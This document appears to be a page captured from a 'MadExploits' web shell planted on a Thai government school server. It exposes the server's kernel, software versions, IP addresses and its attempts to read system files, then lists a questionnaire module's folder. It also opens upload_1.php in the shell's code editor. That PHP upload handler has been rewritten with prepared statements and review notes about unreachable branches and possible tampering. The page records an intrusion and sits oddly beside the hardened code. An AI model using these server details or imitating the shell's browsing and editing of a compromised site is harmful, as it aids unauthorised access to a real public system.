Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
/
var /
www /
html /
amss /
modules /
questionnaire /
school /
Name
Size
Permission
Action
sch_answer_qtn.php
26.11
KB
-rw-r--r--
sch_report1.php
13.2
KB
-rw-r--r--
sync.php
3.79
KB
-rw-r--r--
sync.php.bak
3.79
KB
-rw-r--r--
upload_1.php
7.85
KB
-rw-r--r--
upload_2.php
1.46
KB
-rw-r--r--
upload_2_2.php
1.46
KB
-rw-r--r--
Code Editor : upload_1.php
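<?php
/*
 * Attachment page of the questionnaire module: confirm/delete an attachment,
 * accept an uploaded file, and render the upload form or the attachment list.
 *
 * The script relies on names it does not define itself: $connect (mysqli
 * link), $index (branch selector), $officer (recorded with each upload) and
 * the JavaScript function callfrm().  It is presumably included by a front
 * controller that provides them -- confirm against the caller.
 *
 * Security changes in this revision:
 *   - every SQL statement is a prepared statement; request values are bound,
 *     never concatenated into the SQL text;
 *   - request values and database text are escaped for the context they are
 *     written into (URL component or HTML);
 *   - the upload is moved with move_uploaded_file(), which refuses any path
 *     that is not a genuine HTTP upload, instead of copy() + unlink().
 *
 * NOTE(review): no authentication or authorisation check is visible in this
 * file; it must be enforced by the including script.
 * NOTE(review): the delete branch changes state on a plain GET request with
 * no anti-CSRF token.  Nothing in this file offers a token facility, so that
 * is flagged here rather than changed.
 * NOTE(review): the branches below test $index against 12..16, while the
 * links this page emits use index=2..5, the branch that handles $index==""
 * assigns 5 or 6, and the guard on the next statement admits only index=3.
 * As written, the branches look unreachable through the page's own links.
 * Whether that is a deliberate lock-down or tampering cannot be told from
 * this file; the values are left exactly as found.
 */
if (!(isset($_REQUEST['index']) && $_REQUEST['index'] == 3)) {
    exit();
}

// Read one request value as a string; missing or non-scalar values become "".
$qtn_param = function ($source, $key) {
    return (isset($source[$key]) && is_scalar($source[$key])) ? (string) $source[$key] : '';
};
// Escape text for HTML element or quoted-attribute context.
$qtn_html = function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
};

$get_id      = $qtn_param($_GET, 'id');
$get_use_id  = $qtn_param($_GET, 'qtn_use_id');
$get_qq_id   = $qtn_param($_GET, 'qtn_qq_id');
$post_use_id = $qtn_param($_POST, 'qtn_use_id');
$post_qq_id  = $qtn_param($_POST, 'qtn_qq_id');
$req_use_id  = $qtn_param($_REQUEST, 'qtn_use_id');
$req_qq_id   = $qtn_param($_REQUEST, 'qtn_qq_id');

// Delete confirmation
if ($index == 12) {
    // urlencode() output is safe inside the URL, the JS string and the HTML attribute.
    $confirm_url = "?option=questionnaire&task=main/upload_1&index=3&id=" . urlencode($get_id)
        . "&qtn_use_id=" . urlencode($get_use_id) . "&qtn_qq_id=" . urlencode($get_qq_id);
    $cancel_url = "?option=questionnaire&task=main/upload_1&qtn_use_id=" . urlencode($get_use_id)
        . "&qtn_qq_id=" . urlencode($get_qq_id);

    echo "<br>";
    echo "<table width='500' border='0' align='center'>";
    echo "<tr><td align='center'><font color='#990000' size='4'>โปรดยืนยันความต้องการลบข้อมูลอีกครั้ง</font><br></td></tr>";
    echo "<tr><td align=center>";
    // The second <INPUT> was missing its closing '>' in the original markup.
    echo "<INPUT TYPE='button' name='smb' value='ยืนยัน' onclick='location.href=\"$confirm_url\"'> <INPUT TYPE='button' name='back' value='ยกเลิก' onclick='location.href=\"$cancel_url\"'>";
    echo "</td></tr></table>";
}

// Delete
if ($index == 13) {
    // The original compared id unquoted, so it is treated as an integer key here.
    $delete_id = (int) $get_id;
    $stmt = mysqli_prepare($connect, "delete from questionnaire_upload where id=?");
    if ($stmt) {
        mysqli_stmt_bind_param($stmt, "i", $delete_id);
        mysqli_stmt_execute($stmt);
        mysqli_stmt_close($stmt);
    }
    // NOTE(review): the stored file itself is not removed, as in the original.
    $index = "";
}

// Save an uploaded file
if ($index == 14) {
    $dfile1       = $qtn_param($_POST, 'dfile1');
    $myfile1      = "";
    $myfile1_name = "";
    $upfile1      = "";   // was left undefined when no file was sent

    if (isset($_FILES['myfile1']) && is_string($_FILES['myfile1']['tmp_name'])) {
        $myfile1      = $_FILES['myfile1']['tmp_name'];
        $myfile1_name = (string) $_FILES['myfile1']['name'];
    }

    // Only the final extension is checked, and only that extension is reused
    // in the stored name; the client-supplied name never reaches the disk.
    $lastname1 = strtolower(pathinfo($myfile1_name, PATHINFO_EXTENSION));
    $allowed_ext = array("doc", "docx", "rar", "pdf", "xls", "xlsx", "zip", "jpg", "gif", "png");

    if ($myfile1 <> "" && !in_array($lastname1, $allowed_ext, true)) {
        // The file name is client-controlled: escape it before echoing.
        $upfile1 = "-ไม่อนุญาตให้ทำการแนบไฟล์ " . $qtn_html($myfile1_name) . "<BR> ";
    }

    if ($upfile1 <> "") {
        echo "<B><FONT SIZE=2 COLOR=#990000>มีข้อผิดพลาดเกี่ยวกับไฟล์ของคุณ ดังรายละเอียด</FONT></B><BR>";
        echo "<FONT SIZE=2 COLOR=#990099>";
        echo $upfile1;
        echo "</FONT>";
        echo " <input type=\"button\" value=\" แก้ไข \" onClick=\"javascript:history.go(-1)\" ></CENTER>";
        exit();
    }

    if ($myfile1 <> "") {
        $rec_date    = date("Y-m-d");
        $timestamp   = time();
        $random      = rand();
        $ref_id      = $random . "x" . $timestamp;
        $myfile1name = $ref_id . "_1." . $lastname1;

        // NOTE(review): the target directory is below the web root; the web
        // server should be configured not to execute scripts from it.
        // move_uploaded_file() fails unless $myfile1 is a real HTTP upload,
        // and the row is written only when the file actually landed.
        if (move_uploaded_file($myfile1, "modules/questionnaire/upload_files/" . $myfile1name)) {
            $officer_value = isset($officer) ? (string) $officer : "";
            $stmt = mysqli_prepare(
                $connect,
                "insert into questionnaire_upload(qtn_use_id,qtn_qq_id,message,file,officer,rec_date) values (?,?,?,?,?,?)"
            );
            if ($stmt) {
                mysqli_stmt_bind_param(
                    $stmt,
                    "ssssss",
                    $post_use_id,
                    $post_qq_id,
                    $dfile1,
                    $myfile1name,
                    $officer_value,
                    $rec_date
                );
                mysqli_stmt_execute($stmt);
                mysqli_stmt_close($stmt);
            }
        }
        $index = 6;
    }
}

// No explicit branch requested: choose between the form (5) and the list (6).
if ($index == "") {
    $num_row = 0;
    $stmt = mysqli_prepare($connect, "select id from questionnaire_upload where qtn_use_id=? and qtn_qq_id=?");
    if ($stmt) {
        mysqli_stmt_bind_param($stmt, "ss", $req_use_id, $req_qq_id);
        mysqli_stmt_execute($stmt);
        mysqli_stmt_store_result($stmt);
        $num_row = mysqli_stmt_num_rows($stmt);
        mysqli_stmt_close($stmt);
    }
    if ($num_row == 0) {
        $index = 5;
    } else {
        $index = 6;
    }
}

// Upload form
if ($index == 15) {
    $qq_name = "";
    $stmt = mysqli_prepare($connect, "select qtn_qq_name from questionnaire_qq where qtn_qq_id=? limit 0,1");
    if ($stmt) {
        mysqli_stmt_bind_param($stmt, "s", $get_qq_id);
        mysqli_stmt_execute($stmt);
        mysqli_stmt_bind_result($stmt, $qq_name);
        mysqli_stmt_fetch($stmt);
        mysqli_stmt_close($stmt);
    }
    $qq_name_html = $qtn_html($qq_name);
    $back_url = "?option=questionnaire&task=main/create_use_qtn_detail&index=4&qtn_use_id=" . urlencode($req_use_id);
    $hidden_use_id = $qtn_html($get_use_id);
    $hidden_qq_id  = $qtn_html($get_qq_id);

    echo "<br>";
    echo "<form Enctype = multipart/form-data id='frm1' name='frm1'>";
    echo "<Center>";
    echo "<Font color='#006666' Size='3'><b>เอกสารประกอบ</b></Font>";
    echo "<br><Font color='#006666' Size='2'><b>ข้อคำถาม : $qq_name_html</b></Font>";
    echo "</Center>";   // was the misspelt tag </Cener>
    echo "<Br>";
    echo "<table width='700' border='0' align='center'>";
    echo "<Tr>";
    echo "<td align='right'><INPUT TYPE='button' name='smb' value='<<กลับหน้าก่อน' onclick='location.href=\"$back_url\"'></td></Tr>";
    echo "</table>";
    echo "<table border='1' width='700' id='table1' style='border-collapse: collapse' bordercolor='#C0C0C0'>";
    echo "<tr bgcolor='#003399'>";
    echo "<td colspan='4' height='23' align='left'><font size='2' color='#FFFFFF'> กรุณาระบุรายละเอียด</font></td>";
    echo "</tr>";
    echo "<tr>";
    echo "<td width='371' align='center' colspan='2'><font size='2' color='#800000'>แนบไฟล์</font></td>";
    echo "<td width='238' align='center' colspan='2' align='center'><font size='2' color='#800000'>คำอธิบายไฟล์</font></td>";
    echo "</tr>";
    echo "<tr>";
    echo "<td width='94' align='right'><font size='2' color='#0000FF'>ไฟล์แนบ </font></td>";
    echo "<td width='274'> <input type='file' name='myfile1' size='26' style='background-color: #99ccff'> </td>";
    echo "<td width='238' align='center' colspan='2'><input type='text' name='dfile1' size='31' style='background-color: #BBD1FF'></td>";
    echo "</tr>";
    echo "<tr>";
    echo "<td align='center' colspan='4'><FONT SIZE='2' COLOR='#CC9900'>เฉพาะไฟล์ doc, pdf, xls, gif, jpg, zip, rar เท่านั้น</FONT></td>";
    echo "</tr>";
    echo "<input name='qtn_use_id' type='hidden' value='$hidden_use_id'>";
    echo "<input name='qtn_qq_id' type='hidden' value='$hidden_qq_id'>";
    echo "<tr>";
    echo "<td align='center' colspan='4'><BR><INPUT TYPE='button' name='smb' id='smb' value='ตกลง' onclick='goto_url(1)'></td>";
    echo "</tr>";
    echo "</Table>";
    echo "</form>";
}

// Attachment list
if ($index == 16) {
    $qq_name = "";
    $stmt = mysqli_prepare($connect, "select qtn_qq_name from questionnaire_qq where qtn_qq_id=? limit 0,1");
    if ($stmt) {
        mysqli_stmt_bind_param($stmt, "s", $req_qq_id);
        mysqli_stmt_execute($stmt);
        mysqli_stmt_bind_result($stmt, $qq_name);
        mysqli_stmt_fetch($stmt);
        mysqli_stmt_close($stmt);
    }
    $qq_name_html = $qtn_html($qq_name);
    $add_url = "?option=questionnaire&task=main/upload_1&index=5&qtn_use_id=" . urlencode($req_use_id)
        . "&qtn_qq_id=" . urlencode($req_qq_id);
    $back_url = "?option=questionnaire&task=main/create_use_qtn_detail&index=4&qtn_use_id=" . urlencode($req_use_id);

    echo "<br>";
    echo "<Center>";
    echo "<Font color='#006666' Size='3'><b>เอกสารประกอบ</b></Font>";
    echo "<br><Font color='#006666' Size='2'><b>ข้อคำถาม : $qq_name_html</b></Font>";
    echo "</Center>";   // was the misspelt tag </Cener>
    echo "<br><br>";
    echo "<table width='50%' border='0' align='center'>";
    echo "<Tr><Td colspan='5' align='left'><INPUT TYPE='button' name='smb' value='เพิ่มเอกสาร' onclick='location.href=\"$add_url\"'></Td>";
    echo "<td align='right'><INPUT TYPE='button' name='smb' value='<<กลับหน้าก่อน' onclick='location.href=\"$back_url\"'></td></Tr>";
    echo "</table>";
    echo "<table width='50%' border='1' align=center style='border-collapse: collapse'>";
    echo "<Tr bgcolor='#99ccff' align='center'><Td width='60'>ที่</Td><Td>เอกสาร</Td><Td width='40'>ลบ</Td></Tr>";

    $stmt = mysqli_prepare(
        $connect,
        "select id, message, file, qtn_use_id, qtn_qq_id from questionnaire_upload where qtn_use_id=? and qtn_qq_id=?"
    );
    if ($stmt) {
        mysqli_stmt_bind_param($stmt, "ss", $req_use_id, $req_qq_id);
        mysqli_stmt_execute($stmt);
        mysqli_stmt_store_result($stmt);
        mysqli_stmt_bind_result($stmt, $id, $message, $file, $qtn_use_id, $qtn_qq_id);

        $M = 1;
        while (mysqli_stmt_fetch($stmt)) {
            $color = (($M % 2) == 0) ? "#E5E5FF" : "#FFFFFF";
            // Database text was supplied by users at upload time: escape on output.
            $file_href = "modules/questionnaire/upload_files/" . rawurlencode((string) $file);
            $message_html = $qtn_html($message);
            $delete_url = "?option=questionnaire&task=main/upload_1&index=2&id=" . urlencode((string) $id)
                . "&qtn_use_id=" . urlencode((string) $qtn_use_id) . "&qtn_qq_id=" . urlencode((string) $qtn_qq_id);
            echo "<Tr bgcolor='$color'><Td valign='top' align='center'>$M</Td><td><a href='$file_href' target='_blank'>$message_html</a></td><Td valign='top' align='center'><a href='$delete_url'><img src=images/drop.png border='0' alt='ลบ'></a></td></tr>";
            $M++;
        }
        mysqli_stmt_close($stmt);
    }
    echo "</Table>";
}
?>
<script>
// Client-side convenience check only; the server-side branch above is the
// one that decides whether an upload is accepted.
function goto_url(val) {
    if (val == 1) {
        var file1 = document.frm1.myfile1.value;
        var vdfile1 = document.frm1.dfile1.value;
        if (file1 == "") {
            alert("กรุณาเลือกไฟล์");
        } else if (vdfile1 == "") {
            alert("กรุณากรอกคำอธิบายไฟล์");
        } else {
            callfrm("?option=questionnaire&task=main/upload_1&index=4");
        }
    }
}
</script>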